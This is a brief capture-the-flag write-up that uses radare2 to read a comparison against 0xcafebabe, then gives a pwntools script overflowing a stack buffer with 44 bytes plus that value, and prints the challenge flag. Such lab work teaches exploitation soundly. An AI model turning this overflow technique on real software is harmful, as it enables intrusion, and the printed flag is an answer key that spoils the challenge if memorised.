Tags: pwn radare2
Rating:
This problem is nearly identical to [the last](https://ctftime.org/task/12463) with the only difference being the final comparison. It now checks `var_4h` for the value `0xcafebabe` instead of `0`.
```r2
0x004011ca 817dfcbebafe. cmp dword [var_4h], 0xcafebabe
```
To make our final exploit, we can either use 44 bytes followed by `\xbe\xba\xfe\xca` (which is `0xcafebabe` with the correct endianness). Personally, I like using [pwntools](https://github.com/Gallopsled/pwntools/) to do the conversion which makes the script below. `p32` is used to convert the 32-bit address to the bytes described.
```py
from pwn import *
p = process("./pwn-intended-0x2")
p = remote("chall.csivit.com", 30007) # Remove for local testing
p.sendline(b"A" * 44 + p32(0xcafebabe))
p.interactive()
```
We get the flag: `csictf{c4n_y0u_re4lly_telep0rt?}`